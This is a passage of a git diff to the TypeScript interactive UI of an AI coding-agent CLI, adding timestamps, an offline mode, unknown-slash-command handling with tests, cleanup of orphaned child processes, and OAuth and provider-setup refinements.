(#3455). 
+ const dims = imageComponent.getDimensions?.(); + if (dims) this.resolvedImageDimensions.set(imgIdx, dims); + // Just re-render — don't call updateDisplay() which would + // destroy and recreate all Image components. + this.ui.requestRender(); + }); + } this.imageComponents.push(imageComponent); this.addChild(imageComponent); } @@ -895,7 +920,9 @@ export class ToolExecutionComponent extends Container { // Server-side Anthropic web search text = theme.fg("toolTitle", theme.bold("web search")); - if (this.result) { + if (process.env.PI_OFFLINE === "1") { + text += "\n\n" + theme.fg("muted", "\u{1F50C} Offline \u{2014} web search unavailable"); + } else if (this.result) { const output = this.getTextOutput().trim(); if (output) { const lines = output.split("\n"); @@ -913,8 +940,13 @@ export class ToolExecutionComponent extends Container { // Generic tool (shouldn't reach here for custom tools) text = theme.fg("toolTitle", theme.bold(this.toolName)); - const content = JSON.stringify(this.args, null, 2); - text += `\n\n${content}`; + const contentLines = JSON.stringify(this.args, null, 2).split("\n"); + const maxContentLines = 20; + const truncatedContent = contentLines.slice(0, maxContentLines); + if (contentLines.length > maxContentLines) { + truncatedContent.push("..."); + } + text += `\n\n${truncatedContent.join("\n")}`; const output = this.getTextOutput(); if (output) { text += `\n${output}`; diff --git a/packages/pi-coding-agent/src/modes/interactive/components/user-message-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/user-message-selector.ts index 94ccf93df..800232faa 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/user-message-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/user-message-selector.ts @@ -131,9 +131,10 @@ export class UserMessageSelectorComponent extends Container { this.addChild(new Spacer(1)); this.addChild(new DynamicBorder()); - // Auto-cancel if no messages + // 
Auto-cancel if no messages — invoke on the next microtask + to avoid the 100ms visual flicker from setTimeout if (messages.length === 0) { - setTimeout(() => onCancel(), 100); + Promise.resolve().then(() => onCancel()); } } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/user-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/user-message.ts index a6de30a62..8aab303ba 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/user-message.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/user-message.ts @@ -1,15 +1,21 @@ -import { Container, Markdown, type MarkdownTheme, Spacer } from "@gsd/pi-tui"; +import { Container, Markdown, type MarkdownTheme, Spacer, Text } from "@gsd/pi-tui"; import { getMarkdownTheme, theme } from "../theme/theme.js"; +import { formatTimestamp, type TimestampFormat } from "./timestamp.js"; const OSC133_ZONE_START = "\x1b]133;A\x07"; const OSC133_ZONE_END = "\x1b]133;B\x07"; /** - * Component that renders a user message + * Component that renders a user message with a right-aligned timestamp. 
*/ export class UserMessageComponent extends Container { - constructor(text: string, markdownTheme: MarkdownTheme = getMarkdownTheme()) { + private timestamp: number | undefined; + private timestampFormat: TimestampFormat; + + constructor(text: string, markdownTheme: MarkdownTheme = getMarkdownTheme(), timestamp?: number, timestampFormat: TimestampFormat = "date-time-iso") { super(); + this.timestamp = timestamp; + this.timestampFormat = timestampFormat; this.addChild(new Spacer(1)); this.addChild( new Markdown(text, 1, 1, markdownTheme, { @@ -25,6 +31,15 @@ export class UserMessageComponent extends Container { return lines; } + // Insert right-aligned timestamp above the message content + if (this.timestamp) { + const timeStr = formatTimestamp(this.timestamp, this.timestampFormat); + const label = theme.fg("dim", timeStr); + const padding = Math.max(0, width - timeStr.length - 1); + const timestampLine = " ".repeat(padding) + label; + lines.splice(0, 0, timestampLine); + } + lines[0] = OSC133_ZONE_START + lines[0]; lines[lines.length - 1] = lines[lines.length - 1] + OSC133_ZONE_END; return lines; diff --git a/packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts b/packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts index 32f10d339..0fed98bd4 100644 --- a/packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts +++ b/packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts @@ -6,6 +6,9 @@ import { AssistantMessageComponent } from "../components/assistant-message.js"; import { ToolExecutionComponent } from "../components/tool-execution.js"; import { appKey } from "../components/keybinding-hints.js"; +// Tracks the last processed content index to avoid re-scanning all blocks on every message_update +let lastProcessedContentIndex = 0; + export async function handleAgentEvent(host: InteractiveModeStateHost & { init: () => Promise; getMarkdownThemeWithSettings: () => any; @@ 
-28,6 +31,11 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & { host.footer.invalidate(); + // Reset content index tracker when a new assistant message starts + if (event.type === "message_start" && event.message.role === "assistant") { + lastProcessedContentIndex = 0; + } + switch (event.type) { case "session_state_changed": switch (event.reason) { @@ -100,6 +108,7 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & { undefined, host.hideThinkingBlock, host.getMarkdownThemeWithSettings(), + host.settingsManager.getTimestampFormat(), ); host.streamingMessage = event.message; host.chatContainer.addChild(host.streamingComponent); @@ -112,7 +121,9 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & { if (host.streamingComponent && event.message.role === "assistant") { host.streamingMessage = event.message; host.streamingComponent.updateContent(host.streamingMessage); - for (const content of host.streamingMessage.content) { + const contentBlocks = host.streamingMessage.content; + for (let i = lastProcessedContentIndex; i < contentBlocks.length; i++) { + const content = contentBlocks[i]; if (content.type === "toolCall") { if (!host.pendingTools.has(content.id)) { const component = new ToolExecutionComponent( @@ -144,16 +155,28 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & { } else if (content.type === "webSearchResult") { const component = host.pendingTools.get(content.toolUseId); if (component) { - const searchContent = content.content; - const isError = searchContent && typeof searchContent === "object" && "type" in (searchContent as any) && (searchContent as any).type === "web_search_tool_result_error"; - component.updateResult({ - content: [{ type: "text", text: host.formatWebSearchResult(searchContent) }], - isError: !!isError, - }); - host.pendingTools.delete(content.toolUseId); + if (process.env.PI_OFFLINE === "1") { + component.updateResult({ + content: [{ type: 
"text", text: "Web search disabled (offline mode)" }], + isError: false, + }); + } else { + const searchContent = content.content; + const isError = searchContent && typeof searchContent === "object" && "type" in (searchContent as any) && (searchContent as any).type === "web_search_tool_result_error"; + component.updateResult({ + content: [{ type: "text", text: host.formatWebSearchResult(searchContent) }], + isError: !!isError, + }); + } } } } + // Update index: fully processed blocks won't need re-scanning. + // Keep the last block's index (it may still be accumulating data), + // so we re-check it next time but skip all earlier ones. + if (contentBlocks.length > 0) { + lastProcessedContentIndex = Math.max(0, contentBlocks.length - 1); + } host.ui.requestRender(); } break; @@ -330,5 +353,12 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & { host.showError(event.reason); host.ui.requestRender(); break; + + case "image_overflow_recovery": + host.showStatus( + `Removed ${event.strippedCount} older image(s) to comply with API limits. Retrying...`, + ); + host.ui.requestRender(); + break; } } diff --git a/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.test.ts b/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.test.ts new file mode 100644 index 000000000..6f5d22da5 --- /dev/null +++ b/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.test.ts @@ -0,0 +1,183 @@ +import assert from "node:assert/strict"; +import test from "node:test"; + +import { setupEditorSubmitHandler } from "./input-controller.js"; + +type HostOptions = { + knownSlashCommands?: string[]; +}; + +function getSlashCommandName(text: string): string { + const trimmed = text.trim(); + const spaceIndex = trimmed.indexOf(" "); + return spaceIndex === -1 ? 
trimmed.slice(1) : trimmed.slice(1, spaceIndex); +} + +function createHost(options: HostOptions = {}) { + const prompted: string[] = []; + const errors: string[] = []; + const warnings: string[] = []; + const history: string[] = []; + const knownSlashCommands = new Set(options.knownSlashCommands ?? []); + let editorText = ""; + let settingsOpened = 0; + + const editor = { + setText(text: string) { + editorText = text; + }, + getText() { + return editorText; + }, + addToHistory(text: string) { + history.push(text); + }, + }; + + const host = { + defaultEditor: editor as typeof editor & { onSubmit?: (text: string) => Promise }, + editor, + session: { + isBashRunning: false, + isCompacting: false, + isStreaming: false, + prompt: async (text: string) => { + prompted.push(text); + }, + }, + ui: { + requestRender() {}, + }, + getSlashCommandContext: () => ({ + showSettingsSelector: () => { + settingsOpened += 1; + }, + }), + handleBashCommand: async () => {}, + showWarning(message: string) { + warnings.push(message); + }, + showError(message: string) { + errors.push(message); + }, + updateEditorBorderColor() {}, + isExtensionCommand() { + return false; + }, + isKnownSlashCommand(text: string) { + return knownSlashCommands.has(getSlashCommandName(text)); + }, + queueCompactionMessage() {}, + updatePendingMessagesDisplay() {}, + flushPendingBashComponents() {}, + }; + + setupEditorSubmitHandler(host as any); + + return { + host: host as typeof host & { defaultEditor: typeof editor & { onSubmit: (text: string) => Promise } }, + prompted, + errors, + warnings, + history, + getEditorText: () => editorText, + getSettingsOpened: () => settingsOpened, + }; +} + +test("input-controller: built-in slash commands stay in TUI dispatch", async () => { + const { host, prompted, errors, getSettingsOpened, getEditorText } = createHost(); + + await host.defaultEditor.onSubmit("/settings"); + + assert.equal(getSettingsOpened(), 1, "built-in /settings should open the settings selector"); + 
assert.deepEqual(prompted, [], "built-in slash commands should not reach session.prompt"); + assert.deepEqual(errors, [], "built-in slash commands should not show errors"); + assert.equal(getEditorText(), "", "built-in slash commands should clear the editor after handling"); +}); + +test("input-controller: extension slash commands fall through to session.prompt", async () => { + const { host, prompted, errors, history } = createHost({ knownSlashCommands: ["gsd"] }); + + await host.defaultEditor.onSubmit("/gsd help"); + + assert.deepEqual(prompted, ["/gsd help"], "known extension slash commands should reach session.prompt"); + assert.deepEqual(errors, [], "known extension slash commands should not show unknown-command errors"); + assert.deepEqual(history, ["/gsd help"], "known extension slash commands should still be added to history"); +}); + +test("input-controller: prompt template slash commands fall through to session.prompt", async () => { + const { host, prompted, errors } = createHost({ knownSlashCommands: ["daily"] }); + + await host.defaultEditor.onSubmit("/daily focus area"); + + assert.deepEqual(prompted, ["/daily focus area"]); + assert.deepEqual(errors, []); +}); + +test("input-controller: skill slash commands fall through to session.prompt", async () => { + const { host, prompted, errors } = createHost({ knownSlashCommands: ["skill:create-skill"] }); + + await host.defaultEditor.onSubmit("/skill:create-skill routing bug"); + + assert.deepEqual(prompted, ["/skill:create-skill routing bug"]); + assert.deepEqual(errors, []); +}); + +test("input-controller: disabled skill slash commands stay unknown", async () => { + const { host, prompted, errors } = createHost(); + + await host.defaultEditor.onSubmit("/skill:create-skill routing bug"); + + assert.deepEqual(prompted, []); + assert.deepEqual(errors, ["Unknown command: /skill:create-skill. 
Use slash autocomplete to see available commands."]); +}); + +test("input-controller: /export prefix does not swallow unrelated slash commands", async () => { + const { host, prompted, errors } = createHost(); + + await host.defaultEditor.onSubmit("/exportfoo"); + + assert.deepEqual(prompted, []); + assert.deepEqual(errors, ["Unknown command: /exportfoo. Use slash autocomplete to see available commands."]); +}); + +test("input-controller: truly unknown slash commands stop before session.prompt", async () => { + const { host, prompted, errors, getEditorText } = createHost(); + + await host.defaultEditor.onSubmit("/definitely-not-a-command"); + + assert.deepEqual(prompted, [], "unknown slash commands should not reach session.prompt"); + assert.deepEqual( + errors, + ["Unknown command: /definitely-not-a-command. Use slash autocomplete to see available commands."], + ); + assert.equal(getEditorText(), "", "unknown slash commands should clear the editor after showing the error"); +}); + +test("input-controller: absolute file paths are not treated as slash commands (#3478)", async () => { + const { host, prompted, errors } = createHost(); + + await host.defaultEditor.onSubmit("/Users/name/Desktop/screenshot.png"); + + assert.deepEqual(errors, [], "file paths should not trigger unknown command error"); + assert.deepEqual(prompted, ["/Users/name/Desktop/screenshot.png"], "file paths should be sent as plain input"); +}); + +test("input-controller: Linux absolute paths are not treated as slash commands (#3478)", async () => { + const { host, prompted, errors } = createHost(); + + await host.defaultEditor.onSubmit("/home/user/documents/file.txt"); + + assert.deepEqual(errors, [], "Linux paths should not trigger unknown command error"); + assert.deepEqual(prompted, ["/home/user/documents/file.txt"], "Linux paths should be sent as plain input"); +}); + +test("input-controller: /tmp paths are not treated as slash commands (#3478)", async () => { + const { host, prompted, errors 
} = createHost(); + + await host.defaultEditor.onSubmit("/tmp/some-file.log"); + + assert.deepEqual(errors, []); + assert.deepEqual(prompted, ["/tmp/some-file.log"]); +}); diff --git a/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.ts b/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.ts index 0bb073044..a1fefba87 100644 --- a/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.ts +++ b/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.ts @@ -8,6 +8,7 @@ export function setupEditorSubmitHandler(host: InteractiveModeStateHost & { showError: (message: string) => void; updateEditorBorderColor: () => void; isExtensionCommand: (text: string) => boolean; + isKnownSlashCommand: (text: string) => boolean; queueCompactionMessage: (text: string, mode: "steer" | "followUp") => void; updatePendingMessagesDisplay: () => void; flushPendingBashComponents: () => void; @@ -17,12 +18,18 @@ export function setupEditorSubmitHandler(host: InteractiveModeStateHost & { text = text.trim(); if (!text) return; - if (text.startsWith("/")) { + if (text.startsWith("/") && !looksLikeFilePath(text)) { const handled = await dispatchSlashCommand(text, host.getSlashCommandContext()); if (handled) { host.editor.setText(""); return; } + if (!host.isKnownSlashCommand(text)) { + const command = text.split(/\s/)[0]; + host.showError(`Unknown command: ${command}. Use slash autocomplete to see available commands.`); + host.editor.setText(""); + return; + } } if (text.startsWith("!")) { @@ -46,7 +53,12 @@ export function setupEditorSubmitHandler(host: InteractiveModeStateHost & { if (host.isExtensionCommand(text)) { host.editor.addToHistory?.(text); host.editor.setText(""); - await host.session.prompt(text); + try { + await host.session.prompt(text); + } catch (error: unknown) { + const errorMessage = error instanceof Error ? 
error.message : "Unknown error occurred"; + host.showError(errorMessage); + } } else { host.queueCompactionMessage(text, "steer"); } @@ -82,5 +94,28 @@ export function setupEditorSubmitHandler(host: InteractiveModeStateHost & { } host.editor.addToHistory?.(text); + // submitPromptsDirectly is false — still dispatch via session.prompt so user input + // is not silently discarded. + try { + await host.session.prompt(text); + } catch (error: unknown) { + const errorMessage = error instanceof Error ? error.message : "Unknown error occurred"; + host.showError(errorMessage); + } }; } + +/** + * Distinguish absolute file paths from slash commands (#3478). + * Drag-and-drop inserts paths like "/Users/name/Desktop/file.png" which + * should be treated as plain text input, not a /Users command. + * + * Heuristic: a slash command is a single token like "/help" or "/gsd auto". + * File paths have a second "/" within the first token (e.g., "/Users/..."). + */ +function looksLikeFilePath(text: string): boolean { + const firstToken = text.split(/\s/)[0]; + // Slash commands: /help, /gsd, /commit — single "/" at start only. + // File paths: /Users/name/file, /home/user/file, /tmp/x — contain "/" after position 0. 
+ return firstToken.indexOf("/", 1) !== -1; +} diff --git a/packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts b/packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts index cd9550f12..72e98689e 100644 --- a/packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts +++ b/packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts @@ -7,6 +7,7 @@ import * as crypto from "node:crypto"; import * as fs from "node:fs"; import * as os from "node:os"; import * as path from "node:path"; +import { listDescendants } from "@gsd/native"; import type { AgentMessage } from "@gsd/pi-agent-core"; import type { AssistantMessage, ImageContent, Message, Model, OAuthProviderId } from "@gsd/pi-ai"; import type { @@ -78,9 +79,10 @@ import { ExtensionSelectorComponent } from "./components/extension-selector.js"; import { FooterComponent } from "./components/footer.js"; import { appKey, appKeyHint, editorKey, formatKeyForDisplay, keyHint, rawKeyHint } from "./components/keybinding-hints.js"; import { LoginDialogComponent } from "./components/login-dialog.js"; -import { ModelSelectorComponent } from "./components/model-selector.js"; +import { ModelSelectorComponent, providerDisplayName } from "./components/model-selector.js"; import { OAuthSelectorComponent } from "./components/oauth-selector.js"; import { ProviderManagerComponent } from "./components/provider-manager.js"; +import { getProviderSetupAction } from "./provider-auth-setup.js"; import { ScopedModelsSelectorComponent } from "./components/scoped-models-selector.js"; import { SessionSelectorComponent } from "./components/session-selector.js"; import { SettingsSelectorComponent } from "./components/settings-selector.js"; @@ -107,6 +109,7 @@ import { getThemeByName, initTheme, onThemeChange, + stopThemeWatcher, setRegisteredThemes, setTheme, setThemeInstance, @@ -156,6 +159,10 @@ export interface InteractiveModeOptions { } export class InteractiveMode { + // Cap rendered chat components to 
prevent unbounded memory/CPU growth. + // Only render-components are removed — session transcript stays on disk. + private static readonly MAX_CHAT_COMPONENTS = 100; + private session: AgentSession; private ui: TUI; private chatContainer: Container; @@ -202,6 +209,9 @@ export class InteractiveMode { // Agent subscription unsubscribe function private unsubscribe?: () => void; + // Branch change listener unsubscribe function + private _branchChangeUnsub?: () => void; + // Track if editor is in bash mode (text starts with !) private isBashMode = false; @@ -329,7 +339,7 @@ export class InteractiveMode { return filtered.map((item) => ({ value: item.label, label: item.id, - description: item.provider, + description: providerDisplayName(item.provider), })); }; } @@ -511,7 +521,7 @@ export class InteractiveMode { }); // Set up git branch watcher (uses provider instead of footer) - this.footerDataProvider.onBranchChange(() => { + this._branchChangeUnsub = this.footerDataProvider.onBranchChange(() => { this.ui.requestRender(); }); @@ -1519,6 +1529,13 @@ export class InteractiveMode { options: string[], opts?: ExtensionUIDialogOptions, ): Promise { + // If a previous selector is still active, dispose it before creating a + // new one. This avoids leaking the previous promise and DOM state when + // showExtensionSelector is called rapidly. 
+ if (this.extensionSelector) { + this.hideExtensionSelector(); + } + return new Promise((resolve) => { if (opts?.signal?.aborted) { resolve(undefined); @@ -1982,6 +1999,7 @@ export class InteractiveMode { handleDebugCommand: () => this.handleDebugCommand(), shutdown: () => this.shutdown(), executeCompaction: (instructions, isAuto) => this.executeCompaction(instructions, isAuto), + handleBashCommand: (command, options) => this.handleBashCommand(command, options?.excludeFromContext, options?.displayCommand, options?.loginShell), }; } @@ -1990,8 +2008,9 @@ export class InteractiveMode { } private subscribeToAgent(): void { - this.unsubscribe = this.session.subscribe(async (event) => { - await this.handleEvent(event); + let eventQueue: Promise = Promise.resolve(); + this.unsubscribe = this.session.subscribe((event) => { + eventQueue = eventQueue.then(() => this.handleEvent(event)).catch(() => {}); }); } @@ -2092,11 +2111,13 @@ export class InteractiveMode { const userComponent = new UserMessageComponent( skillBlock.userMessage, this.getMarkdownThemeWithSettings(), + message.timestamp, + this.settingsManager.getTimestampFormat(), ); this.chatContainer.addChild(userComponent); } } else { - const userComponent = new UserMessageComponent(textContent, this.getMarkdownThemeWithSettings()); + const userComponent = new UserMessageComponent(textContent, this.getMarkdownThemeWithSettings(), message.timestamp, this.settingsManager.getTimestampFormat()); this.chatContainer.addChild(userComponent); } if (options?.populateHistory) { @@ -2110,6 +2131,7 @@ export class InteractiveMode { message, this.hideThinkingBlock, this.getMarkdownThemeWithSettings(), + this.settingsManager.getTimestampFormat(), ); this.chatContainer.addChild(assistantComponent); break; @@ -2122,6 +2144,18 @@ export class InteractiveMode { const _exhaustive: never = message; } } + this.trimChatHistory(); + } + + /** + * Remove oldest components when chat exceeds MAX_CHAT_COMPONENTS. 
+ * Only render-components are removed — session data stays in SessionManager. + */ + private trimChatHistory(): void { + while (this.chatContainer.children.length > InteractiveMode.MAX_CHAT_COMPONENTS) { + const oldest = this.chatContainer.children[0]; + this.chatContainer.removeChild(oldest); + } } /** @@ -2216,6 +2250,7 @@ export class InteractiveMode { } this.pendingTools.clear(); + this.trimChatHistory(); this.ui.requestRender(); } @@ -2309,6 +2344,21 @@ export class InteractiveMode { if (shutdownBehavior === "stop_ui") { return; } + + // Kill ALL descendant processes to prevent orphans (next-server, pnpm dev, etc.) + try { + const descendants = listDescendants(process.pid); + for (const childPid of descendants) { + try { process.kill(childPid, "SIGTERM"); } catch {} + } + if (descendants.length > 0) { + await new Promise(resolve => setTimeout(resolve, 500)); + for (const childPid of descendants) { + try { process.kill(childPid, "SIGKILL"); } catch {} + } + } + } catch {} + process.exit(0); } @@ -2331,24 +2381,36 @@ export class InteractiveMode { const ignoreSigint = () => {}; process.on("SIGINT", ignoreSigint); - // Set up handler to restore TUI when resumed - process.once("SIGCONT", () => { + try { + // Set up handler to restore TUI when resumed + process.once("SIGCONT", () => { + process.removeListener("SIGINT", ignoreSigint); + this.ui.start(); + this.ui.requestRender(true); + }); + + // Stop the TUI (restore terminal to normal mode) + this.ui.stop(); + + // Send SIGTSTP to process group (pid=0 means all processes in group) + process.kill(0, "SIGTSTP"); + } catch { + // If suspend fails (e.g. SIGTSTP not supported), ensure the + // SIGINT listener doesn't leak. 
process.removeListener("SIGINT", ignoreSigint); - this.ui.start(); - this.ui.requestRender(true); - }); - - // Stop the TUI (restore terminal to normal mode) - this.ui.stop(); - - // Send SIGTSTP to process group (pid=0 means all processes in group) - process.kill(0, "SIGTSTP"); + } } private async handleFollowUp(): Promise { const text = (this.editor.getExpandedText?.() ?? this.editor.getText()).trim(); if (!text) return; + if (text.startsWith("/") && !this.isKnownSlashCommand(text)) { + const command = text.split(/\s/)[0]; + this.showError(`Unknown command: ${command}. Use slash autocomplete to see available commands.`); + return; + } + // Queue input during compaction (extension commands execute immediately) if (this.session.isCompacting) { if (this.isExtensionCommand(text)) { @@ -2460,7 +2522,14 @@ export class InteractiveMode { // Determine editor (respect $VISUAL, then $EDITOR) const editorCmd = process.env.VISUAL || process.env.EDITOR; if (!editorCmd) { - this.showWarning("No editor configured. Set $VISUAL or $EDITOR environment variable."); + let msg = "No editor configured. Set $VISUAL or $EDITOR environment variable."; + if (process.env.TERM_PROGRAM === "iTerm.app") { + msg += + "\n\nTip: If you meant to open the GSD dashboard (Ctrl+Alt+G), set Left Option Key to" + + " \"Esc+\" in iTerm2 → Profiles → Keys. With the default \"Normal\" setting," + + " Ctrl+Alt+G sends Ctrl+G instead."; + } + this.showWarning(msg); return; } @@ -2624,6 +2693,12 @@ export class InteractiveMode { } private queueCompactionMessage(text: string, mode: "steer" | "followUp"): void { + if (text.startsWith("/") && !this.isKnownSlashCommand(text)) { + const command = text.split(/\s/)[0]; + this.showError(`Unknown command: ${command}. 
Use slash autocomplete to see available commands.`); + return; + } + this.compactionQueuedMessages.push({ text, mode }); this.editor.addToHistory?.(text); this.editor.setText(""); @@ -2642,6 +2717,32 @@ export class InteractiveMode { return !!extensionRunner.getCommand(commandName); } + private isKnownSlashCommand(text: string): boolean { + if (!text.startsWith("/")) return false; + + const spaceIndex = text.indexOf(" "); + const commandName = spaceIndex === -1 ? text.slice(1) : text.slice(1, spaceIndex); + + if (BUILTIN_SLASH_COMMANDS.some((command) => command.name === commandName)) { + return true; + } + + if (this.isExtensionCommand(text)) { + return true; + } + + if (this.session.promptTemplates.some((template) => template.name === commandName)) { + return true; + } + + if (commandName.startsWith("skill:") && this.settingsManager.getEnableSkillCommands()) { + const skillName = commandName.slice("skill:".length); + return this.session.resourceLoader.getSkills().skills.some((skill) => skill.name === skillName); + } + + return false; + } + private async flushCompactionQueue(options?: { willRetry?: boolean }): Promise { if (this.compactionQueuedMessages.length === 0) { return; @@ -2775,6 +2876,7 @@ export class InteractiveMode { respectGitignoreInPicker: this.settingsManager.getRespectGitignoreInPicker(), quietStartup: this.settingsManager.getQuietStartup(), clearOnShrink: this.settingsManager.getClearOnShrink(), + timestampFormat: this.settingsManager.getTimestampFormat(), }, { onAutoCompactChange: (enabled) => { @@ -2878,6 +2980,9 @@ export class InteractiveMode { this.settingsManager.setRespectGitignoreInPicker(enabled); this.autocompleteProvider?.setRespectGitignore(enabled); }, + onTimestampFormatChange: (format) => { + this.settingsManager.setTimestampFormat(format); + }, onCancel: () => { done(); this.ui.requestRender(); @@ -3307,6 +3412,23 @@ export class InteractiveMode { done(); this.ui.requestRender(); }, + async (provider: string) => { + done(); + + 
const action = getProviderSetupAction({ + provider, + authMode: this.session.modelRegistry.getProviderAuthMode(provider), + hasAuth: this.session.modelRegistry.authStorage.hasAuth(provider), + }); + + if (action.kind === "oauth-login") { + await this.showLoginDialog(provider); + return; + } + + this.showStatus(action.message); + this.ui.requestRender(); + }, ); return { component, focus: component }; }); @@ -3401,14 +3523,6 @@ export class InteractiveMode { this.ui.setFocus(dialog); this.ui.requestRender(); - // Promise for manual code input (racing with callback server) - let manualCodeResolve: ((code: string) => void) | undefined; - let manualCodeReject: ((err: Error) => void) | undefined; - const manualCodePromise = new Promise((resolve, reject) => { - manualCodeResolve = resolve; - manualCodeReject = reject; - }); - // Restore editor helper — also disposes the dialog to reject any // dangling promises and prevent the UI from getting stuck. const restoreEditor = () => { @@ -3424,23 +3538,7 @@ export class InteractiveMode { onAuth: (info: { url: string; instructions?: string }) => { dialog.showAuth(info.url, info.instructions); - if (usesCallbackServer) { - // Show input for manual paste, racing with callback - dialog - .showManualInput("Paste redirect URL below, or complete login in browser:") - .then((value) => { - if (value && manualCodeResolve) { - manualCodeResolve(value); - manualCodeResolve = undefined; - } - }) - .catch(() => { - if (manualCodeReject) { - manualCodeReject(new Error("Login cancelled")); - manualCodeReject = undefined; - } - }); - } else if (providerId === "github-copilot") { + if (!usesCallbackServer && providerId === "github-copilot") { // GitHub Copilot polls after onAuth dialog.showWaiting("Waiting for browser authentication..."); } @@ -3455,7 +3553,12 @@ export class InteractiveMode { dialog.showProgress(message); }, - onManualCodeInput: () => manualCodePromise, + // Callback-server providers race browser callback with pasted redirect 
URL. + // Keep manual-input promise ownership inside provider flow to avoid + // orphaned rejections when the callback is not consumed. + onManualCodeInput: usesCallbackServer + ? () => dialog.showManualInput("Paste redirect URL below, or complete login in browser:") + : undefined, signal: dialog.signal, }); @@ -3487,12 +3590,6 @@ export class InteractiveMode { this.showStatus(`Logged in to ${providerName}. Credentials saved to ${getAuthPath()}`); } catch (error: unknown) { restoreEditor(); - // Also reject the manual code promise if it's still pending - if (manualCodeReject) { - manualCodeReject(new Error("Login cancelled")); - manualCodeReject = undefined; - manualCodeResolve = undefined; - } const errorMsg = error instanceof Error ? error.message : String(error); if (errorMsg !== "Login cancelled" && !errorMsg.includes("Superseded") && !errorMsg.includes("disposed")) { this.showError(`Failed to login to ${providerName}: ${errorMsg}`); @@ -3645,8 +3742,9 @@ export class InteractiveMode { } } - private async handleBashCommand(command: string, excludeFromContext = false): Promise { + private async handleBashCommand(command: string, excludeFromContext = false, displayCommand?: string, loginShell?: boolean): Promise { const extensionRunner = this.session.extensionRunner; + const label = displayCommand || command; // Emit user_bash event to let extensions intercept const eventResult = extensionRunner @@ -3663,7 +3761,7 @@ export class InteractiveMode { const result = eventResult.result; // Create UI component for display - this.bashComponent = new BashExecutionComponent(command, this.ui, excludeFromContext); + this.bashComponent = new BashExecutionComponent(label, this.ui, excludeFromContext); if (this.session.isStreaming) { this.pendingMessagesContainer.addChild(this.bashComponent); this.pendingBashComponents.push(this.bashComponent); @@ -3691,7 +3789,7 @@ export class InteractiveMode { // Normal execution path (possibly with custom operations) const isDeferred = 
this.session.isStreaming; - this.bashComponent = new BashExecutionComponent(command, this.ui, excludeFromContext); + this.bashComponent = new BashExecutionComponent(label, this.ui, excludeFromContext); if (isDeferred) { // Show in pending area when agent is streaming @@ -3712,7 +3810,7 @@ export class InteractiveMode { this.ui.requestRender(); } }, - { excludeFromContext, operations: eventResult?.operations }, + { excludeFromContext, operations: eventResult?.operations, loginShell }, ); if (this.bashComponent) { @@ -3801,6 +3899,33 @@ export class InteractiveMode { this.loadingAnimation = undefined; } this.clearExtensionTerminalInputListeners(); + + // Clean up branch change listener (Fix 1) + this._branchChangeUnsub?.(); + this._branchChangeUnsub = undefined; + + // Clean up theme change listener and watcher (Fix 2) + onThemeChange(() => {}); + stopThemeWatcher(); + + // Resolve any pending getUserInput promise so the run() loop can exit (Fix 3) + if (this.onInputCallback) { + this.onInputCallback(""); + this.onInputCallback = undefined; + } + + // Dispose extension widgets, custom footer, and custom header (Fix 4) + this.clearExtensionWidgets(); + if (this.customFooter?.dispose) { + this.customFooter.dispose(); + } + this.customFooter = undefined; + if (this.customHeader?.dispose) { + this.customHeader.dispose(); + } + this.customHeader = undefined; + this.autocompleteProvider = undefined; + this.footer.dispose(); this.footerDataProvider.dispose(); if (this.unsubscribe) { diff --git a/packages/pi-coding-agent/src/modes/interactive/provider-auth-setup.ts b/packages/pi-coding-agent/src/modes/interactive/provider-auth-setup.ts new file mode 100644 index 000000000..6f22384a5 --- /dev/null +++ b/packages/pi-coding-agent/src/modes/interactive/provider-auth-setup.ts @@ -0,0 +1,40 @@ +import type { ProviderAuthMode } from "../../core/model-registry.js"; + +export type ProviderSetupAction = + | { kind: "oauth-login" } + | { kind: "status"; message: string }; + +export 
function getProviderSetupAction(options: { + provider: string; + authMode: ProviderAuthMode; + hasAuth: boolean; +}): ProviderSetupAction { + const { provider, authMode, hasAuth } = options; + + if (authMode === "oauth") { + return { kind: "oauth-login" }; + } + + if (authMode === "none") { + return { + kind: "status", + message: `${provider} does not need auth setup. Use /model to select it.`, + }; + } + + if (authMode === "externalCli") { + return { + kind: "status", + message: hasAuth + ? `${provider} is already authenticated. Use /model to select it.` + : `${provider} uses external CLI auth. Sign in with the provider CLI, then use /model.`, + }; + } + + return { + kind: "status", + message: hasAuth + ? `${provider} already has credentials configured. Use /model to select it.` + : `${provider} uses API-key auth, not OAuth. Configure its credentials, then use /model.`, + }; +} diff --git a/packages/pi-coding-agent/src/modes/interactive/slash-command-handlers.ts b/packages/pi-coding-agent/src/modes/interactive/slash-command-handlers.ts index 46a0e82b0..c510e63b4 100644 --- a/packages/pi-coding-agent/src/modes/interactive/slash-command-handlers.ts +++ b/packages/pi-coding-agent/src/modes/interactive/slash-command-handlers.ts @@ -104,6 +104,9 @@ export interface SlashCommandContext { // For compaction executeCompaction(customInstructions?: string, isAuto?: boolean): Promise; + + // Bash execution + handleBashCommand(command: string, options?: { excludeFromContext?: boolean; displayCommand?: string; loginShell?: boolean }): Promise; } // --------------------------------------------------------------------------- @@ -133,7 +136,7 @@ export async function dispatchSlashCommand( await ctx.handleModelCommand(searchTerm); return true; } - if (text.startsWith("/export")) { + if 